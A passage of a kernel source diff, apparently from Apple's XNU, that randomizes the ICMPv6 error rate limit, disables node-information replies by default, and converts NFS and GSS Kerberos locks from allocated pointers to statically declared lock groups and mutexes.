EPROTOTYPE; + if (inp == NULL) { + return EINVAL; } if (inp->inp_faddr.s_addr == INADDR_ANY) { return ENOTCONN; diff --git a/bsd/netinet6/icmp6.c b/bsd/netinet6/icmp6.c index 08954c8ef..6e276598c 100644 --- a/bsd/netinet6/icmp6.c +++ b/bsd/netinet6/icmp6.c @@ -148,6 +148,7 @@ struct icmp6stat icmp6stat; extern struct inpcbhead ripcb; extern int icmp6errppslim; +extern int icmp6errppslim_random_incr; extern int icmp6rappslim; static int icmp6errpps_count = 0; static int icmp6rapps_count = 0; @@ -186,6 +187,11 @@ icmp6_init(struct ip6protosw *pp, struct domain *dp) if (!icmp6_initialized) { icmp6_initialized = 1; mld_init(); + if (icmp6errppslim >= 0 && + icmp6errppslim_random_incr > 0 && + icmp6errppslim <= INT32_MAX - (icmp6errppslim_random_incr + 1)) { + icmp6errppslim += (random() % icmp6errppslim_random_incr) + 1; + } } } @@ -3296,8 +3302,17 @@ icmp6_ratelimit( } } else if (!ppsratecheck(&icmp6errppslim_last, &icmp6errpps_count, icmp6errppslim)) { - /* The packet is subject to rate limit */ - ret++; + /* + * We add some randomness here to still generate ICMPv6 error + * post icmp6errppslim limit with a probability that goes down + * with increased value of icmp6errpps_count. + */ + if (icmp6errpps_count > 0 && icmp6errppslim > 0 && + icmp6errpps_count > icmp6errppslim && + (random() % (icmp6errpps_count - icmp6errppslim)) != 0) { + /* The packet is subject to rate limit */ + ret++; + } } return ret; diff --git a/bsd/netinet6/in6_proto.c b/bsd/netinet6/in6_proto.c index 6ee55d379..f64ee80af 100644 --- a/bsd/netinet6/in6_proto.c +++ b/bsd/netinet6/in6_proto.c @@ -485,9 +485,11 @@ u_int32_t rip6_recvspace = RIPV6RCVQ; /* ICMPV6 parameters */ int icmp6_rediraccept = 1; /* accept and process redirects */ int icmp6_redirtimeout = 10 * 60; /* 10 minutes */ -int icmp6errppslim = 500; /* 500 packets per second */ +uint32_t icmp6errppslim = 500; /* 500 packets per second */ +uint32_t icmp6errppslim_random_incr = 500; /* We further randomize icmp6errppslim + * with this during icmpv6 initialization*/ int icmp6rappslim = 10; /* 10 packets per second */ -int icmp6_nodeinfo = 3; /* enable/disable NI response */ +int icmp6_nodeinfo = 0; /* enable/disable NI response */ /* UDP on IP6 parameters */ int udp6_sendspace = 9216; /* really max datagram size */ @@ -749,6 +751,8 @@ SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_NODEINFO, nodeinfo, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6_nodeinfo, 0, ""); SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT, errppslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim, 0, ""); +SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR, + errppslimit_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim_random_incr, 0, ""); SYSCTL_INT(_net_inet6_icmp6, OID_AUTO, rappslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6rappslim, 0, ""); SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ND6_DEBUG, diff --git a/bsd/nfs/gss/gss_krb5_mech.c b/bsd/nfs/gss/gss_krb5_mech.c index d0a36689a..91a87a8a8 100644 --- a/bsd/nfs/gss/gss_krb5_mech.c +++ b/bsd/nfs/gss/gss_krb5_mech.c @@ -71,7 +71,7 @@ #include #include "gss_krb5_mech.h" -lck_grp_t *gss_krb5_mech_grp; +LCK_GRP_DECLARE(gss_krb5_mech_grp, "gss_krb5_mech"); typedef struct crypt_walker_ctx { size_t length; @@ -198,7 +198,6 @@ gss_krb5_mech_init(void) } return; } - gss_krb5_mech_grp = lck_grp_alloc_init("gss_krb5_mech", LCK_GRP_ATTR_NULL); gss_krb5_mech_initted = GSS_KRB5_INITIALIZED; } @@ -578,12 +577,12 @@ krb5_mic(crypto_ctx_t ctx, gss_buffer_t header, gss_buffer_t bp, gss_buffer_t tr if (ikey) { if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } key2use = ctx->ks.ikey[kdx]; } else { @@ -625,12 +624,12 @@ krb5_mic_mbuf(crypto_ctx_t ctx, gss_buffer_t header, if (ikey) { if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } key2use = ctx->ks.ikey[kdx]; } else { @@ -679,12 +678,12 @@ krb5_crypt_mbuf(crypto_ctx_t ctx, mbuf_t *mbp, size_t len, int encrypt, cccbc_ct int error; if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { - lck_mtx_lock(ctx->lock); + lck_mtx_lock(&ctx->lock); if (!(ctx->flags & CRYPTO_KS_ALLOCED)) { cc_key_schedule_create(ctx); } ctx->flags |= CRYPTO_KS_ALLOCED; - lck_mtx_unlock(ctx->lock); + lck_mtx_unlock(&ctx->lock); } if (!ks) { ks = encrypt ? ctx->ks.enc : ctx->ks.dec; @@ -989,6 +988,8 @@ cc_key_schedule_create(crypto_ctx_t ctx) void gss_crypto_ctx_free(crypto_ctx_t ctx) { + lck_mtx_destroy(&ctx->lock, &gss_krb5_mech_grp); + ctx->ks.ikey[GSS_SND] = NULL; if (ctx->ks.ikey[GSS_RCV] && ctx->key != ctx->ks.ikey[GSS_RCV]) { cc_clear(ctx->keylen, ctx->ks.ikey[GSS_RCV]); @@ -1074,7 +1075,7 @@ gss_crypto_ctx_init(struct crypto_ctx *ctx, lucid_context_t lucid) return ENOTSUP; } - ctx->lock = lck_mtx_alloc_init(gss_krb5_mech_grp, LCK_ATTR_NULL); + lck_mtx_init(&ctx->lock, &gss_krb5_mech_grp, LCK_ATTR_NULL); return 0; } diff --git a/bsd/nfs/gss/gss_krb5_mech.h b/bsd/nfs/gss/gss_krb5_mech.h index bf00a65a2..a41e778be 100644 --- a/bsd/nfs/gss/gss_krb5_mech.h +++ b/bsd/nfs/gss/gss_krb5_mech.h @@ -236,7 +236,7 @@ typedef struct crypto_ctx { uint32_t etype; uint32_t flags; size_t mpad; /* Message padding */ - lck_mtx_t *lock; + lck_mtx_t lock; lucid_context_t gss_ctx; /* Back pointer to lucid context */ void *key; /* Points to session key from lucid context */ const struct ccdigest_info *di; diff --git a/bsd/nfs/nfs.h b/bsd/nfs/nfs.h index a27fa20e5..53b2fd794 100644 --- a/bsd/nfs/nfs.h +++ b/bsd/nfs/nfs.h @@ -632,7 +632,7 @@ extern uint32_t nfsrv_user_stat_enabled; /* enable/disable active extern uint32_t nfsrv_user_stat_node_count; /* current count of user stat nodes */ extern uint32_t nfsrv_user_stat_max_idle_sec; /* idle seconds (node no longer considered active) */ extern uint32_t nfsrv_user_stat_max_nodes; /* active user list size limit */ -extern lck_grp_t *nfsrv_active_user_mutex_group; +extern lck_grp_t nfsrv_active_user_mutex_group; /* An active user node represented in the kernel */ struct nfs_user_stat_node { @@ -718,7 +718,7 @@ struct nfsrv_fmod { #define NFSRVFMODHASH(vp) (((uintptr_t) vp) & nfsrv_fmod_hash) extern LIST_HEAD(nfsrv_fmod_hashhead, nfsrv_fmod) * nfsrv_fmod_hashtbl; extern u_long nfsrv_fmod_hash; -extern lck_mtx_t *nfsrv_fmod_mutex; +extern lck_mtx_t nfsrv_fmod_mutex; extern int nfsrv_fmod_pending, nfsrv_fsevents_enabled; #endif @@ -988,7 +988,7 @@ struct nfsreq { */ TAILQ_HEAD(nfs_reqqhead, nfsreq); extern struct nfs_reqqhead nfs_reqq; -extern lck_grp_t *nfs_request_grp; +extern lck_grp_t nfs_request_grp; #define R_XID32(x) ((x) & 0xffffffff) @@ -1115,8 +1115,8 @@ extern TAILQ_HEAD(nfsrv_sockhead, nfsrv_sock) nfsrv_socklist, nfsrv_sockwg, nfsrv_sockwait, nfsrv_sockwork; /* lock groups for nfsrv_sock's */ -extern lck_grp_t *nfsrv_slp_rwlock_group; -extern lck_grp_t *nfsrv_slp_mutex_group; +extern lck_grp_t nfsrv_slp_rwlock_group; +extern lck_grp_t nfsrv_slp_mutex_group; /* * One of these structures is allocated for each nfsd. @@ -1169,15 +1169,15 @@ typedef int (*nfsrv_proc_t)(struct nfsrv_descript *, struct nfsrv_sock *, vfs_context_t, mbuf_t *); /* mutex for nfs server */ -extern lck_mtx_t *nfsd_mutex; +extern lck_mtx_t nfsd_mutex; extern int nfsd_thread_count, nfsd_thread_max; /* request list mutex */ -extern lck_mtx_t *nfs_request_mutex; +extern lck_mtx_t nfs_request_mutex; extern int nfs_request_timer_on; /* mutex for nfs client globals */ -extern lck_mtx_t *nfs_global_mutex; +extern lck_mtx_t nfs_global_mutex; #if CONFIG_NFS4 /* NFSv4 callback globals */ @@ -1206,7 +1206,6 @@ int vtonfsv2_mode(enum vtype, mode_t); void nfs_mbuf_init(void); -void nfs_nhinit(void); void nfs_nhinit_finish(void); u_long nfs_hash(u_char *, int); diff --git a/bsd/nfs/nfs4_subs.c b/bsd/nfs/nfs4_subs.c index 22627a247..9cc410b44 100644 --- a/bsd/nfs/nfs4_subs.c +++ b/bsd/nfs/nfs4_subs.c @@ -122,7 +122,7 @@ nfs4_init_clientid(struct nfsmount *nmp) static uint8_t en0addr[6]; static uint8_t en0addr_set = 0; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (!en0addr_set) { ifnet_t interface = NULL; error = ifnet_find_by_name("en0", &interface); @@ -139,7 +139,7 @@ nfs4_init_clientid(struct nfsmount *nmp) ifnet_release(interface); } } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); MALLOC(ncip, struct nfs_client_id *, sizeof(struct nfs_client_id), M_TEMP, M_WAITOK); if (!ncip) { @@ -185,7 +185,7 @@ nfs4_init_clientid(struct nfsmount *nmp) } /* make sure the ID is unique, and add it to the sorted list */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_FOREACH(ncip2, &nfsclientids, nci_link) { if (ncip->nci_idlen > ncip2->nci_idlen) { continue; @@ -220,7 +220,7 @@ nfs4_init_clientid(struct nfsmount *nmp) TAILQ_INSERT_TAIL(&nfsclientids, ncip, nci_link); } nmp->nm_longid = ncip; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return 0; } @@ -468,7 +468,12 @@ out: interval = 1; } lck_mtx_unlock(&nmp->nm_lock); - nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000); + + lck_mtx_lock(&nmp->nm_timer_lock); + if (nmp->nm_renew_timer) { + nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000); + } + lck_mtx_unlock(&nmp->nm_timer_lock); } /* diff --git a/bsd/nfs/nfs4_vnops.c b/bsd/nfs/nfs4_vnops.c index 4e1c7641f..7a5b838d5 100644 --- a/bsd/nfs/nfs4_vnops.c +++ b/bsd/nfs/nfs4_vnops.c @@ -2003,7 +2003,7 @@ tryagain: return NULL; } bzero(newnoop, sizeof(*newnoop)); - lck_mtx_init(&newnoop->noo_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnoop->noo_lock, &nfs_open_grp, LCK_ATTR_NULL); newnoop->noo_mount = nmp; kauth_cred_ref(cred); newnoop->noo_cred = cred; @@ -2039,7 +2039,7 @@ nfs_open_owner_destroy(struct nfs_open_owner *noop) if (noop->noo_cred) { kauth_cred_unref(&noop->noo_cred); } - lck_mtx_destroy(&noop->noo_lock, nfs_open_grp); + lck_mtx_destroy(&noop->noo_lock, &nfs_open_grp); FREE(noop, M_TEMP); } @@ -2228,7 +2228,7 @@ alloc: return ENOMEM; } bzero(newnofp, sizeof(*newnofp)); - lck_mtx_init(&newnofp->nof_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnofp->nof_lock, &nfs_open_grp, LCK_ATTR_NULL); newnofp->nof_owner = noop; nfs_open_owner_ref(noop); newnofp->nof_np = np; @@ -2272,7 +2272,7 @@ nfs_open_file_destroy(struct nfs_open_file *nofp) TAILQ_REMOVE(&nofp->nof_owner->noo_opens, nofp, nof_oolink); lck_mtx_unlock(&nofp->nof_owner->noo_lock); nfs_open_owner_rele(nofp->nof_owner); - lck_mtx_destroy(&nofp->nof_lock, nfs_open_grp); + lck_mtx_destroy(&nofp->nof_lock, &nfs_open_grp); FREE(nofp, M_TEMP); } @@ -3351,7 +3351,7 @@ tryagain: return NULL; } bzero(newnlop, sizeof(*newnlop)); - lck_mtx_init(&newnlop->nlo_lock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&newnlop->nlo_lock, &nfs_open_grp, LCK_ATTR_NULL); newnlop->nlo_pid = pid; newnlop->nlo_pid_start = p->p_start; newnlop->nlo_name = OSAddAtomic(1, &nfs_lock_owner_seqnum); @@ -3387,7 +3387,7 @@ nfs_lock_owner_destroy(struct nfs_lock_owner *nlop) nfs_open_owner_rele(nlop->nlo_open_owner); nlop->nlo_open_owner = NULL; } - lck_mtx_destroy(&nlop->nlo_lock, nfs_open_grp); + lck_mtx_destroy(&nlop->nlo_lock, &nfs_open_grp); FREE(nlop, M_TEMP); } @@ -4199,7 +4199,14 @@ restart: error = EIO; } if (!error) { + if (busy) { + nfs_open_state_clear_busy(np); + busy = 0; + } error = nmp->nm_funcs->nf_setlock_rpc(np, nofp, newnflp, 0, 0, vfs_context_thread(ctx), vfs_context_ucred(ctx)); + if (!busy && !nfs_open_state_set_busy(np, vfs_context_thread(ctx))) { + busy = 1; + } } if (!error || ((error != NFSERR_DENIED) && (error != NFSERR_GRACE))) { break; @@ -7479,13 +7486,13 @@ nfs4_vnop_rmdir( * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } FREE(dul, M_TEMP); return error; diff --git a/bsd/nfs/nfs_bio.c b/bsd/nfs/nfs_bio.c index b9c2b5ac1..54cd34dc2 100644 --- a/bsd/nfs/nfs_bio.c +++ b/bsd/nfs/nfs_bio.c @@ -117,10 +117,10 @@ int nfs_nbdwrite; int nfs_buf_timer_on = 0; thread_t nfsbufdelwrithd = NULL; -ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE); +static ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE); -lck_grp_t *nfs_buf_lck_grp; -lck_mtx_t *nfs_buf_mutex; +static LCK_GRP_DECLARE(nfs_buf_lck_grp, "nfs buf"); +LCK_MTX_DECLARE(nfs_buf_mutex, &nfs_buf_lck_grp); #define NFSBUF_FREE_PERIOD 30 /* seconds */ #define NFSBUF_LRU_STALE 120 @@ -215,9 +215,6 @@ nfs_buf_pgs_is_set(nfsbufpgs *nfsbp) void nfs_nbinit(void) { - nfs_buf_lck_grp = lck_grp_alloc_init("nfs_buf", LCK_GRP_ATTR_NULL); - nfs_buf_mutex = lck_mtx_alloc_init(nfs_buf_lck_grp, LCK_ATTR_NULL); - nfsbufcnt = nfsbufmetacnt = nfsbuffreecnt = nfsbuffreemetacnt = nfsbufdelwricnt = 0; nfsbufmin = 128; @@ -241,13 +238,13 @@ nfs_buf_timer(__unused void *param0, __unused void *param1) { nfs_buf_freeup(1); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (nfsbufcnt <= nfsbufmin) { nfs_buf_timer_on = 0; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_interval_timer_start(nfs_buf_timer_call, NFSBUF_FREE_PERIOD * 1000); @@ -266,7 +263,7 @@ nfs_buf_freeup(int timer) TAILQ_INIT(&nfsbuffreeup); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); microuptime(&now); @@ -330,7 +327,7 @@ nfs_buf_freeup(int timer) FSDBG(320, nfsbufcnt, nfsbuffreecnt, nfsbuffreemetacnt, 0); NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); while ((fbp = TAILQ_FIRST(&nfsbuffreeup))) { TAILQ_REMOVE(&nfsbuffreeup, fbp, nb_free); @@ -380,13 +377,13 @@ boolean_t nfs_buf_is_incore(nfsnode_t np, daddr64_t blkno) { boolean_t rv; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (nfs_buf_incore(np, blkno)) { rv = TRUE; } else { rv = FALSE; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return rv; } @@ -428,7 +425,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset) return ENXIO; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp = nfs_buf_incore(VTONFS(vp), (daddr64_t)(offset / nmp->nm_biosize)); if (!bp) { goto out; @@ -461,7 +458,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset) } } out: - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } @@ -658,15 +655,15 @@ nfs_buf_delwri_service(void) TAILQ_INSERT_TAIL(&nfsbufdelwri, bp, nb_free); nfsbufdelwricnt++; nfs_buf_drop(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_flushcommits(np, 1); } else { SET(bp->nb_flags, NB_ASYNC); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_write(bp); } i++; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } } @@ -679,13 +676,13 @@ nfs_buf_delwri_thread(__unused void *arg, __unused wait_result_t wr) struct timespec ts = { .tv_sec = 30, .tv_nsec = 0 }; int error = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (!error) { nfs_buf_delwri_service(); - error = msleep(&nfsbufdelwrithd, nfs_buf_mutex, 0, "nfsbufdelwri", &ts); + error = msleep(&nfsbufdelwrithd, &nfs_buf_mutex, 0, "nfsbufdelwri", &ts); } nfsbufdelwrithd = NULL; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); thread_terminate(nfsbufdelwrithd); } @@ -700,7 +697,7 @@ nfs_buf_delwri_push(int locked) return; } if (!locked) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } /* wake up the delayed write service thread */ if (nfsbufdelwrithd) { @@ -713,7 +710,7 @@ nfs_buf_delwri_push(int locked) nfs_buf_delwri_service(); } if (!locked) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } @@ -787,16 +784,16 @@ nfs_buf_get( } loop: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); /* wait for any buffer invalidation/flushing to complete */ while (np->n_bflag & NBINVALINPROG) { np->n_bflag |= NBINVALWANT; ts.tv_sec = 2; ts.tv_nsec = 0; - msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts); + msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts); if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0, error); return error; } @@ -810,7 +807,7 @@ loop: /* if busy, set wanted and wait */ if (ISSET(bp->nb_lflags, NBL_BUSY)) { if (flags & NBLK_NOWAIT) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, bp, 0xbcbcbcbc); return 0; } @@ -819,7 +816,7 @@ loop: ts.tv_sec = 2; ts.tv_nsec = 0; - msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP, + msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP, "nfsbufget", (slpflag == PCATCH) ? NULL : &ts); slpflag = 0; FSDBG_BOT(543, np, blkno, bp, bp->nb_flags); @@ -843,7 +840,7 @@ loop: } if (flags & NBLK_ONLYVALID) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0, 0x0000cace); return 0; } @@ -982,7 +979,7 @@ loop: nfs_buf_delwri_push(1); nfsneedbuffer = 1; - msleep(&nfsneedbuffer, nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL); + msleep(&nfsneedbuffer, &nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL); FSDBG_BOT(546, np, blkno, nfsbufcnt, nfsbufmax); if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { FSDBG_BOT(541, np, blkno, 0, error); @@ -1005,7 +1002,7 @@ loop: buffer_setup: /* unlock hash */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); switch (operation) { case NBLK_META: @@ -1026,7 +1023,7 @@ buffer_setup: if (!bp->nb_data) { /* Ack! couldn't allocate the data buffer! */ /* clean up buffer and return error */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_REMOVE(bp, nb_vnbufs); bp->nb_vnbufs.le_next = NFSNOLIST; bp->nb_np = NULL; @@ -1037,7 +1034,7 @@ buffer_setup: } TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free); nfsbuffreecnt++; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0xb00, ENOMEM); return ENOMEM; } @@ -1067,7 +1064,7 @@ buffer_setup: /* unable to create upl */ /* vm object must no longer exist */ /* clean up buffer and return error */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_REMOVE(bp, nb_vnbufs); bp->nb_vnbufs.le_next = NFSNOLIST; bp->nb_np = NULL; @@ -1078,7 +1075,7 @@ buffer_setup: } TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free); nfsbuffreecnt++; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(541, np, blkno, 0x2bc, EIO); return EIO; } @@ -1190,7 +1187,7 @@ pagelist_cleanup_done: bp->nb_pagelist = NULL; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); wakeup_needbuffer = wakeup_buffer = wakeup_nbdwrite = 0; @@ -1273,7 +1270,7 @@ pagelist_cleanup_done: FSDBG_BOT(548, bp, NBOFF(bp), bp->nb_flags, bp->nb_data); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (wakeup_needbuffer) { wakeup(&nfsneedbuffer); @@ -1298,13 +1295,13 @@ nfs_buf_iowait(struct nfsbuf *bp) { FSDBG_TOP(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (!ISSET(bp->nb_flags, NB_DONE)) { - msleep(bp, nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL); + msleep(bp, &nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); FSDBG_BOT(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error); @@ -1345,10 +1342,10 @@ nfs_buf_iodone(struct nfsbuf *bp) SET(bp->nb_flags, NB_DONE); /* note that it's done */ nfs_buf_release(bp, 1); } else { /* or just wakeup the buffer */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); SET(bp->nb_flags, NB_DONE); /* note that it's done */ CLR(bp->nb_lflags, NBL_WANTED); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(bp); } @@ -1371,14 +1368,14 @@ nfs_buf_write_delayed(struct nfsbuf *bp) if (!ISSET(bp->nb_flags, NB_DELWRI)) { SET(bp->nb_flags, NB_DELWRI); /* move to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite++; NFSBUFCNTCHK(); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } /* @@ -1489,7 +1486,7 @@ nfs_buf_acquire(struct nfsbuf *bp, int flags, int slpflag, int slptimeo) /* the hz value is 100; which leads to 10ms */ ts.tv_nsec = (slptimeo % 100) * 10 * NSEC_PER_USEC * 1000; - error = msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1), + error = msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1), "nfs_buf_acquire", &ts); if (error) { return error; @@ -1551,7 +1548,7 @@ nfs_buf_iterprepare(nfsnode_t np, struct nfsbuflists *iterheadp, int flags) while (np->n_bufiterflags & NBI_ITER) { np->n_bufiterflags |= NBI_ITERWANT; - msleep(&np->n_bufiterflags, nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL); + msleep(&np->n_bufiterflags, &nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL); } if (LIST_EMPTY(listheadp)) { LIST_INIT(iterheadp); @@ -1778,19 +1775,19 @@ nfs_buf_read_rpc(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) SET(bp->nb_flags, NB_ERROR); if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) { nrpcs = (length + nmrsize - 1) / nmrsize; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp->nb_rpcs -= nrpcs; if (bp->nb_rpcs == 0) { /* No RPCs left, so the buffer's done */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_iodone(bp); } else { /* wait for the last RPC to mark it done */ while (bp->nb_rpcs > 0) { - msleep(&bp->nb_rpcs, nfs_buf_mutex, 0, + msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0, "nfs_buf_read_rpc_cancel", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { nfs_buf_iodone(bp); @@ -1993,14 +1990,14 @@ out: multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC); if (multasyncrpc) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } bp->nb_rpcs--; finished = (bp->nb_rpcs == 0); if (multasyncrpc) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } if (finished) { @@ -2513,21 +2510,21 @@ nfs_buf_write(struct nfsbuf *bp) CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI)); if (ISSET(oldflags, NB_DELWRI)) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite--; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(&nfs_nbdwrite); } /* move to clean list */ if (ISSET(oldflags, (NB_ASYNC | NB_DELWRI))) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } nfs_node_lock_force(np); np->n_numoutput++; @@ -2694,12 +2691,12 @@ out: error = nfs_buf_iowait(bp); /* move to clean list */ if (oldflags & NB_DELWRI) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } FSDBG_BOT(553, bp, NBOFF(bp), bp->nb_flags, error); nfs_buf_release(bp, 1); @@ -2801,10 +2798,10 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) CLR(bp->nb_flags, NB_INVAL); if (!ISSET(bp->nb_flags, NB_DELWRI)) { SET(bp->nb_flags, 